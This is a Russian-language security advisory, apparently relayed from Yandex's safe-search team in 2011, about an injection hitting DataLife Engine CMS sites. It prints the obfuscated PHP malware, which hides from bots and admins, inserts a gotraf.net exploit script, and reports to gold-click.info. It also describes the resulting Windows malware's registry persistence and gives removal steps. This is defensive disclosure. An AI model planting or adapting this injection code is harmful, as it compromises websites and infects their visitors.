Внимание: обнаружен вредоносный код с gotraf.net

На днях команда безопасного поиска Яндекса выявила новый вредоносный код. Причиной заражения сайтов вредоносным кодом часто становится взлом систем управления контентом с последующим изменением их исходных кодов.

В последнее время стали чаще происходить случаи заражения сайтов, работающих на CMS DataLife Engine кодом, который добавляет на страницу тег <script>.

Пример кода, которым происходит заражение:


<? $GLOBALS['_dleget_']=Array(base64_decode('' .'cHJlZ19' .'tYX' .'RjaA=='),base64_decode('cH' .'JlZ19' .'tYXRjaA=='),base64_decode('cHJlZ19tY' .'XRjaA==')); ?><? function dleget($i){$a=Array('ZGxl X3Bhc3N3b3Jk','L3lhbmRleC 9p','SFRUUF9VU0VSX0FHRU5U ','L2dvb2dsZS9p','SFRUUF9 VU0VSX0FHRU5U','L2JvdC9p' ,'SFRUUF9VU0VSX0FHRU5U', PHNjcmlwdCBsYW5ndWFnZT0iS mF2YVNjcmlwdCIgY2hhcnNldD 0id2luZG93cy0xMjUxIiByZWw 9Im5vZm9sbG93IiBzcmM9Imh0 dHA6Ly9nb3RyYWYubmV0L2luL nBocD9pZD0xMTEiPjwvc2NyaX B0Pg== ');return base64_decode($a[$i]);} ?><? if((!isset($_COOKIE[dlege t(0)]))and(!$GLOBALS['_dl eget_'][0](dleget(1),$_SE RVER[dleget(2)]))and(!$GL OBALS['_dleget_'][1](dleg et(3),$_SERVER[dleget(4)] ))and(!$GLOBALS['_dleget_ '][2](dleget(5),$_SERVER[ dleget(6)]))){echo dleget(7);} if(isset($_SERVER["HTTP_HOST"])){ $host = str_replace("www.","",$_SERVER["HTTP_HOST"]); file_get_contents('http:/ /gold-click.info/tds.php? jkdptbw='.$host);} ?>

Данный код проверяет, установлены ли cookie с именем dle_password и присутствуют ли в значении HTTP-заголовка User-Agent следующие строки:
  • yandex
  • google
  • bot
Если cookie с именем dle_password не установлены и в значении HTTP заголовка User-Agent не присутствует строк yandex, google или bot, то в код страницы вставляется:

<script& src=http://gotraf.net/in.php?id=<id>
где <id> – трёхзначное число.

Общие рекомендации, как удалить со страницы вредоносный код и больше не дать его разместить, описаны в соответствующем разделе помощи. Узнать подробности о том, какие страницы заражены, можно, зарегистрировав заражённый сайт на Яндекс.Вебмастере.

При посещении сайта, который использует CMS, зараженную данным серверным скриптом, в браузере автоматически исполняется браузерный скрипт, подгружаемый с хоста gotraf.net. Этот браузерный скрипт пытается эксплуатировать уязвимости в популярных браузерах и сторонних продуктах. При удачной эксплуатации хотя бы одной из уязвимостей на компьютер пользователя загружается и устанавливается вредоносное ПО.

По данным с virustotal.com, на 19.07.2011 вредоносное ПО с хоста gotraf.net детектировалось только антивирусами:
Хэши вредоносного файла:
  • MD5: c852cb73a67be8080b292577e77349d0 ;
  • SHA1: d66db7ab31b5b6ac83cb17b58e40f1eca3acc2d9 ;
  • SHA256: d01d44972e2e853907ec0f6ac aa9ff60bb797825c0dd107655 f1b963c70ce2a1 .
Вирус блокирует работу операционной системы, копирует себя в папку C:\Program Files\Common Files\ с именем winlogin.exe, а также создает 2 записи в реестре, чтобы при каждом последующем старте операционной системы происходил его запуск.

Записи в реестре:
  • HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Winlogon\Shell = Explorer.exe "C:\Program Files\Common Files\winlogin.exe";
  • HKEY_LOCAL_MACHINE\softwa re\microsoft\Windows\Curr entVersion\Run\winlogin = "C:\Program Files\Common Files\winlogin.exe" .
Для удаления вируса с компьютера пользователя вручную, нужно удалить соответствующие записи в реестре, а также файл winlogin.exe (не перепутайте с winlogon.exe) .

 

Подробности на http://safesearch.ya.ru

Bing разместил рекламу в результатах выдачи

На днях поисковая система Bing шокировала общественность, разместив рекламные ссылки непосредственно в результатах поисковой выдачи

Блог по разработке интерфейсов Яндекса появился на я.ру

Сегодня у разработчиков интерфейсов Яндекса появился свой официальный блог

Google отсудил домен Google.UA

Компания Google отстояла в суде свое право на домен google.ua...

Яндекс.Карты теперь и для навигаторов

21 июня 2011 года стартовало приложение Яндекс.Карты для Windows CE — платформы, на которой работает большинство навигаторов

Bing ищет технологию корректировки ошибок в запросах

Bing и Microsoft Research провели всемирный конкурс на лучшую технологию корректировки опечаток в поисковых запросах

Google тестирует новый формат рекламных объявлений в Gmail

Начиная с середины июля, Интернет-пользователи США смогли оценить новый формат рекламных объявлений, предназначенных для электронной почты Gmail